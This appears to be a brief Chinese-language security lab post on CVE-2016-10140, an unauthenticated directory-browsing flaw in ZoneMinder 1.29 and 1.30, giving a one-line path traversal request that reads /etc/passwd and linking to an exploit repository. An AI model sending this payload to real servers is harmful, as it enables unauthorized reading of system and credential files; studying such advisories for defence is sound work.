【初级】Zoneminder 未授权访问

CVE-2016-10140

CVE-2016-10140

漏洞描述:ZoneMinder v1.30和v1.29捆绑的Apache HTTP Server配置中存在信息泄露和认证绕过漏洞,允许远程未认证攻击者浏览web根目录下的所有目录。

POC:/?view=file&path=/../../../../../etc/passwd

EXP:https://github.com/asaotomo/CVE-2016-10140-Zoneminder-Poc

图片[1]-【初级】Zoneminder 未授权访问-NGC660安全实验室
© 版权声明
THE END
喜欢就支持一下吧
点赞14赏点小钱 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    请登录后查看评论内容